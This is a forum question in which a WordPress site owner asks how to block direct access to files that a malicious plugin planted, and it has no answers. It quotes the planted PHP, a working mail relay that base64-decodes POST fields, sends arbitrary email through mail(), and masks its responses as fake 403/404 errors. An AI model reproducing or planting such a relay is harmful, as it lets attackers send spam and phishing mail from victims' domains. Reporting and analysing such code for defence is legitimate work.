WordPress disable direct access of files in WordPress installation path


I want to add a security feature to my WordPress website to stop direct access to files added to the root of WordPress installation, recently I discovered that a malicious plugin added some files to send email. Below is the malicious php code added.



switch ($method) {
  case 'GET':
    //Here Handle GET Request
    echo '###ERROR 404';
  case 'POST':
    //Here Handle POST Request

foreach($_POST as $key => $x_value) {

$data = base64_decode($x_value) ;
$to_data = explode('|',  $data);

$to = $to_data[0];
$x_subject = $to_data[1];
$x_body = $to_data[2];
$from_user = $to_data[3];
$from_email = $to_data[4];
$header = $to_data[5];

$jfnbrsjfq =  mail($to, $x_subject, $x_body, $header);
if($jfnbrsjfq){echo 'error 403';} else {echo 'error 404 : ' . $jfnbrsjfq;} 


In this case the hacker would pass some parameters to send emails using my domain while using this code.

I thought there might be a way to disable direct access of this files to send email or any other malicious activity. Is there a way to restrict using nginx? What is the best approach to deal with this case. I will appreciate any useful input.

kikuyu1 5 months 2020-12-22T06:10:26-05:00 0 Answers 6 views 0

Leave an answer